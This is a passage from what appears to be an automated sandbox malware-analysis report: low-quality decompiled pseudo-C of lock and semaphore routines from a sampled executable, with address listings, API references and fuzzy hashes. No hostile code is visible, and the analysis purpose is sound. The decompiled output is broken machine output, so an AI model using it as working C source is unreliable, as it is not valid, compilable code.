                                                                                                                                                                                                                                                                                                        						_t34 = _t45 + 0x60;
                                                                                                                                                                                                                                                                                                        						_v32 = _t34;
                                                                                                                                                                                                                                                                                                        						_t35 = _t45 + 0x48;
                                                                                                                                                                                                                                                                                                        						_v36 = _t35;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t45 + 0x10)) = 0x3fffffff;
                                                                                                                                                                                                                                                                                                        						_v40 = _t34;
                                                                                                                                                                                                                                                                                                        						 *_t62 = _t35;
                                                                                                                                                                                                                                                                                                        						_t37 = E00416590( *((intOrPtr*)(_t45 + 0x68)), 0xffffffff, 1);
                                                                                                                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                                                                                                                        							L13:
                                                                                                                                                                                                                                                                                                        							_v32 = _t37;
                                                                                                                                                                                                                                                                                                        							 *_t62 = _t59;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							_t38 = _v32;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t60 + 8)))) = _t38;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 8)) -  *((intOrPtr*)(_t45 + 0x10));
                                                                                                                                                                                                                                                                                                        							 *_t62 = _v32;
                                                                                                                                                                                                                                                                                                        							_t37 = E00415CC0( *((intOrPtr*)(_t45 + 0x68)), _v36, 1);
                                                                                                                                                                                                                                                                                                        							if(_t37 != 0) {
                                                                                                                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								 *((intOrPtr*)(_t45 + 0x10)) = 0;
                                                                                                                                                                                                                                                                                                        								goto L9;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t45 + 0x10)) = _t33 + 1;
                                                                                                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                                                                                                        						 *_t62 = _t59;
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        						_t64 = _t62 - 4;
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v32 = _t32;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t45 + 0xc)) = _t32 - 1;
                                                                                                                                                                                                                                                                                                        					 *_t62 = _t59;
                                                                                                                                                                                                                                                                                                        					LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        					_t64 = _t62 - 4;
                                                                                                                                                                                                                                                                                                        					if(_v32 != 1) {
                                                                                                                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                                                                                                                        						 *_t64 =  *((intOrPtr*)(_t60 + 4));
                                                                                                                                                                                                                                                                                                        						_t38 = E00413FD0();
                                                                                                                                                                                                                                                                                                        						if(_t38 != 0) {
                                                                                                                                                                                                                                                                                                        							goto L5;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						 *_t64 = _t45 + 0x60;
                                                                                                                                                                                                                                                                                                        						_t38 = E00415CC0( *((intOrPtr*)(_t45 + 0x68)), _t45 + 0x48, 1);
                                                                                                                                                                                                                                                                                                        						if(_t38 != 0) {
                                                                                                                                                                                                                                                                                                        							L5:
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t60 + 8)))) = _t38;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t38;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x00416ba9
                                                                                                                                                                                                                                                                                                        0x00416bac
                                                                                                                                                                                                                                                                                                        0x00416bae
                                                                                                                                                                                                                                                                                                        0x00416bb1
                                                                                                                                                                                                                                                                                                        0x00416bb4
                                                                                                                                                                                                                                                                                                        0x00416bba
                                                                                                                                                                                                                                                                                                        0x00416bbd
                                                                                                                                                                                                                                                                                                        0x00416bc2
                                                                                                                                                                                                                                                                                                        0x00416c20
                                                                                                                                                                                                                                                                                                        0x00416c28
                                                                                                                                                                                                                                                                                                        0x00416c40
                                                                                                                                                                                                                                                                                                        0x00416c45
                                                                                                                                                                                                                                                                                                        0x00416c48
                                                                                                                                                                                                                                                                                                        0x00416c4d
                                                                                                                                                                                                                                                                                                        0x00416c53
                                                                                                                                                                                                                                                                                                        0x00416c5a
                                                                                                                                                                                                                                                                                                        0x00416c63
                                                                                                                                                                                                                                                                                                        0x00416c6b
                                                                                                                                                                                                                                                                                                        0x00416c72
                                                                                                                                                                                                                                                                                                        0x00416ca0
                                                                                                                                                                                                                                                                                                        0x00416ca0
                                                                                                                                                                                                                                                                                                        0x00416ca3
                                                                                                                                                                                                                                                                                                        0x00416ca6
                                                                                                                                                                                                                                                                                                        0x00416caf
                                                                                                                                                                                                                                                                                                        0x00416cb2
                                                                                                                                                                                                                                                                                                        0x00416c74
                                                                                                                                                                                                                                                                                                        0x00416c7f
                                                                                                                                                                                                                                                                                                        0x00416c85
                                                                                                                                                                                                                                                                                                        0x00416c8b
                                                                                                                                                                                                                                                                                                        0x00416c92
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416c94
                                                                                                                                                                                                                                                                                                        0x00416c94
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416c94
                                                                                                                                                                                                                                                                                                        0x00416c92
                                                                                                                                                                                                                                                                                                        0x00416c2a
                                                                                                                                                                                                                                                                                                        0x00416c2d
                                                                                                                                                                                                                                                                                                        0x00416c30
                                                                                                                                                                                                                                                                                                        0x00416c30
                                                                                                                                                                                                                                                                                                        0x00416c33
                                                                                                                                                                                                                                                                                                        0x00416c39
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416c39
                                                                                                                                                                                                                                                                                                        0x00416bc4
                                                                                                                                                                                                                                                                                                        0x00416bc7
                                                                                                                                                                                                                                                                                                        0x00416bca
                                                                                                                                                                                                                                                                                                        0x00416bcd
                                                                                                                                                                                                                                                                                                        0x00416bd0
                                                                                                                                                                                                                                                                                                        0x00416bd9
                                                                                                                                                                                                                                                                                                        0x00416bdf
                                                                                                                                                                                                                                                                                                        0x00416c00
                                                                                                                                                                                                                                                                                                        0x00416c03
                                                                                                                                                                                                                                                                                                        0x00416c06
                                                                                                                                                                                                                                                                                                        0x00416c0d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416be1
                                                                                                                                                                                                                                                                                                        0x00416bea
                                                                                                                                                                                                                                                                                                        0x00416bf2
                                                                                                                                                                                                                                                                                                        0x00416bf9
                                                                                                                                                                                                                                                                                                        0x00416c0f
                                                                                                                                                                                                                                                                                                        0x00416c12
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416bf9
                                                                                                                                                                                                                                                                                                        0x00416bdf
                                                                                                                                                                                                                                                                                                        0x00416c1b

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00416BB4
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00416BD0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00415CC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CD4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00415CC0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CFB
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00416C33
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8458b5734e16408b39341963bf49e5e1ccedcd04d7dc40a0a900725c30042377
                                                                                                                                                                                                                                                                                                        • Instruction ID: afac81c6ed25875daa77134f2d8d7e06c8d97d8ea1c66be795d6737b6d9f3f86
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8458b5734e16408b39341963bf49e5e1ccedcd04d7dc40a0a900725c30042377
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5311874A003058FCB10EF69D4846AABBF4FF48314F01856AEC958B345E738E886CBD6
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                                                                                                                        			E00416830(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t36;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t54;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t23 = 0x16;
                                                                                                                                                                                                                                                                                                        				_t52 = _t51 - 0x10;
                                                                                                                                                                                                                                                                                                        				_t41 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_t41 == 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t23;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t36 =  *_t41;
                                                                                                                                                                                                                                                                                                        				if(_t36 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t36 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					_t23 = 0;
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if( *_t36 == 0xc0bab1fd) {
                                                                                                                                                                                                                                                                                                        					_t3 = _t36 + 0x14; // 0x40ef44
                                                                                                                                                                                                                                                                                                        					_t49 = _t3;
                                                                                                                                                                                                                                                                                                        					 *_t52 = _t49;
                                                                                                                                                                                                                                                                                                        					EnterCriticalSection(??);
                                                                                                                                                                                                                                                                                                        					_t4 = _t36 + 0xc; // 0x26748d
                                                                                                                                                                                                                                                                                                        					_t24 =  *_t4;
                                                                                                                                                                                                                                                                                                        					_t54 = _t52 - 4;
                                                                                                                                                                                                                                                                                                        					if(_t24 == 0) {
                                                                                                                                                                                                                                                                                                        						_t10 = _t36 + 0x10; // 0x424448b
                                                                                                                                                                                                                                                                                                        						if( *((intOrPtr*)(_t36 + 8)) <=  *_t10) {
                                                                                                                                                                                                                                                                                                        							L15:
                                                                                                                                                                                                                                                                                                        							 *_t54 = _t49;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							_t23 = 0;
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t12 = _t36 + 0x68; // 0x5f74c085
                                                                                                                                                                                                                                                                                                        						_t13 = _t36 + 0x60; // 0x40ef90
                                                                                                                                                                                                                                                                                                        						_v24 = _t13;
                                                                                                                                                                                                                                                                                                        						_t15 = _t36 + 0x48; // 0x40ef78
                                                                                                                                                                                                                                                                                                        						 *_t54 = _t15;
                                                                                                                                                                                                                                                                                                        						_t28 = E00416590( *_t12, 0xffffffff, 1);
                                                                                                                                                                                                                                                                                                        						if(_t28 != 0) {
                                                                                                                                                                                                                                                                                                        							_v16 = _t28;
                                                                                                                                                                                                                                                                                                        							 *_t54 = _t49;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							_t23 = _v16;
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t16 = _t36 + 0x10; // 0x424448b
                                                                                                                                                                                                                                                                                                        						_t45 =  *_t16;
                                                                                                                                                                                                                                                                                                        						_t17 = _t36 + 8; // 0x90c3ffff
                                                                                                                                                                                                                                                                                                        						_t30 =  *_t17;
                                                                                                                                                                                                                                                                                                        						if(_t45 != 0) {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t36 + 0x10)) = 0;
                                                                                                                                                                                                                                                                                                        							_t30 = _t30 - _t45;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 8)) = _t30 - 1;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 0xc)) = 1;
                                                                                                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                                                                                                        						 *_t54 = _t49;
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        						_t8 = _t36 + 0x64; // 0x8b0000
                                                                                                                                                                                                                                                                                                        						_t9 = _t36 + 0x2c; // 0x40ef5c
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t54 - 4)) = _t36 + 0x44;
                                                                                                                                                                                                                                                                                                        						_t33 = E00415CC0( *_t8, _t9, 1);
                                                                                                                                                                                                                                                                                                        						E00412210();
                                                                                                                                                                                                                                                                                                        						_t23 = _t33;
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t5 = _t36 + 8; // 0x90c3ffff
                                                                                                                                                                                                                                                                                                        					_t47 =  *_t5;
                                                                                                                                                                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t36 + 8)) = _t47 - 1;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t36 + 0xc)) = _t24 + 1;
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x00416831
                                                                                                                                                                                                                                                                                                        0x0041683a
                                                                                                                                                                                                                                                                                                        0x0041683d
                                                                                                                                                                                                                                                                                                        0x00416842
                                                                                                                                                                                                                                                                                                        0x00416857
                                                                                                                                                                                                                                                                                                        0x0041685d
                                                                                                                                                                                                                                                                                                        0x0041685d
                                                                                                                                                                                                                                                                                                        0x00416844
                                                                                                                                                                                                                                                                                                        0x00416848
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041684d
                                                                                                                                                                                                                                                                                                        0x00416860
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416860
                                                                                                                                                                                                                                                                                                        0x00416855
                                                                                                                                                                                                                                                                                                        0x00416864
                                                                                                                                                                                                                                                                                                        0x00416864
                                                                                                                                                                                                                                                                                                        0x00416867
                                                                                                                                                                                                                                                                                                        0x0041686a
                                                                                                                                                                                                                                                                                                        0x00416870
                                                                                                                                                                                                                                                                                                        0x00416870
                                                                                                                                                                                                                                                                                                        0x00416873
                                                                                                                                                                                                                                                                                                        0x00416878
                                                                                                                                                                                                                                                                                                        0x004168c0
                                                                                                                                                                                                                                                                                                        0x004168c6
                                                                                                                                                                                                                                                                                                        0x00416910
                                                                                                                                                                                                                                                                                                        0x00416910
                                                                                                                                                                                                                                                                                                        0x00416913
                                                                                                                                                                                                                                                                                                        0x0041691c
                                                                                                                                                                                                                                                                                                        0x00416921
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416921
                                                                                                                                                                                                                                                                                                        0x004168c8
                                                                                                                                                                                                                                                                                                        0x004168cb
                                                                                                                                                                                                                                                                                                        0x004168d3
                                                                                                                                                                                                                                                                                                        0x004168d7
                                                                                                                                                                                                                                                                                                        0x004168da
                                                                                                                                                                                                                                                                                                        0x004168e2
                                                                                                                                                                                                                                                                                                        0x004168e9
                                                                                                                                                                                                                                                                                                        0x00416928
                                                                                                                                                                                                                                                                                                        0x0041692b
                                                                                                                                                                                                                                                                                                        0x0041692e
                                                                                                                                                                                                                                                                                                        0x00416937
                                                                                                                                                                                                                                                                                                        0x0041693c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041693c
                                                                                                                                                                                                                                                                                                        0x004168eb
                                                                                                                                                                                                                                                                                                        0x004168eb
                                                                                                                                                                                                                                                                                                        0x004168ee
                                                                                                                                                                                                                                                                                                        0x004168ee
                                                                                                                                                                                                                                                                                                        0x004168f3
                                                                                                                                                                                                                                                                                                        0x004168f5
                                                                                                                                                                                                                                                                                                        0x004168fc
                                                                                                                                                                                                                                                                                                        0x004168fc
                                                                                                                                                                                                                                                                                                        0x00416901
                                                                                                                                                                                                                                                                                                        0x00416904
                                                                                                                                                                                                                                                                                                        0x00416891
                                                                                                                                                                                                                                                                                                        0x00416891
                                                                                                                                                                                                                                                                                                        0x00416894
                                                                                                                                                                                                                                                                                                        0x0041689a
                                                                                                                                                                                                                                                                                                        0x0041689d
                                                                                                                                                                                                                                                                                                        0x004168ab
                                                                                                                                                                                                                                                                                                        0x004168ae
                                                                                                                                                                                                                                                                                                        0x004168b5
                                                                                                                                                                                                                                                                                                        0x004168ba
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004168ba
                                                                                                                                                                                                                                                                                                        0x0041687a
                                                                                                                                                                                                                                                                                                        0x0041687a
                                                                                                                                                                                                                                                                                                        0x0041687f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041688b
                                                                                                                                                                                                                                                                                                        0x0041688e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041688e
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(0040EF30,?,?,0041586E), ref: 0041686A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,0041586E), ref: 00416894
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 67f6eefd186e211514c6403da3bfbfd4d13a57ff0a28058042ffd3782a5fdb61
                                                                                                                                                                                                                                                                                                        • Instruction ID: 05cb7648b5923e93bfa705c3ba05a15a8be0429bffce4b91882e804ee0f157c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67f6eefd186e211514c6403da3bfbfd4d13a57ff0a28058042ffd3782a5fdb61
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07316CB06002018FDB10BF69C5C46AA7BA1FF44314F15C96EEC158B34AE739D985CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                                                                                                                        			E00416950(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t35;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t49;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t23 = 0x16;
                                                                                                                                                                                                                                                                                                        				_t49 = _t48 - 0x1c;
                                                                                                                                                                                                                                                                                                        				_t40 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_t40 == 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t23;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t35 =  *_t40;
                                                                                                                                                                                                                                                                                                        				if(_t35 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t35 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					_t23 = 0;
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if( *_t35 == 0xc0bab1fd) {
                                                                                                                                                                                                                                                                                                        					_t46 = _t35 + 0x14;
                                                                                                                                                                                                                                                                                                        					 *_t49 = _t46;
                                                                                                                                                                                                                                                                                                        					EnterCriticalSection(??);
                                                                                                                                                                                                                                                                                                        					_t24 =  *((intOrPtr*)(_t35 + 0xc));
                                                                                                                                                                                                                                                                                                        					_t51 = _t49 - 4;
                                                                                                                                                                                                                                                                                                        					if(_t24 == 0) {
                                                                                                                                                                                                                                                                                                        						if( *((intOrPtr*)(_t35 + 8)) <=  *((intOrPtr*)(_t35 + 0x10))) {
                                                                                                                                                                                                                                                                                                        							L15:
                                                                                                                                                                                                                                                                                                        							 *_t51 = _t46;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							_t23 = 0;
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v40 = _t35 + 0x60;
                                                                                                                                                                                                                                                                                                        						 *_t51 = _t35 + 0x48;
                                                                                                                                                                                                                                                                                                        						_t28 = E00416590( *((intOrPtr*)(_t35 + 0x68)), 0xffffffff, 1);
                                                                                                                                                                                                                                                                                                        						if(_t28 != 0) {
                                                                                                                                                                                                                                                                                                        							_v32 = _t28;
                                                                                                                                                                                                                                                                                                        							 *_t51 = _t46;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							_t23 = _v32;
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t30 =  *((intOrPtr*)(_t35 + 0x10));
                                                                                                                                                                                                                                                                                                        						_t45 =  *((intOrPtr*)(_t35 + 8));
                                                                                                                                                                                                                                                                                                        						if(_t30 != 0) {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t35 + 0x10)) = 0;
                                                                                                                                                                                                                                                                                                        							_t45 = _t45 - _t30;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t35 + 8)) = 0;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t35 + 0xc)) = _t45;
                                                                                                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                                                                                                        						 *_t51 = _t46;
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t51 - 4)) = _t35 + 0x44;
                                                                                                                                                                                                                                                                                                        						_t32 = E00415CC0( *((intOrPtr*)(_t35 + 0x64)), _t35 + 0x2c, _t45);
                                                                                                                                                                                                                                                                                                        						E00412210();
                                                                                                                                                                                                                                                                                                        						_t23 = _t32;
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t45 =  *((intOrPtr*)(_t35 + 8));
                                                                                                                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 8)) = 0;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 0xc)) = _t24 + _t45;
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                                                                                                        0x00416951
                                                                                                                                                                                                                                                                                                        0x0041695b
                                                                                                                                                                                                                                                                                                        0x0041695e
                                                                                                                                                                                                                                                                                                        0x00416963
                                                                                                                                                                                                                                                                                                        0x00416978
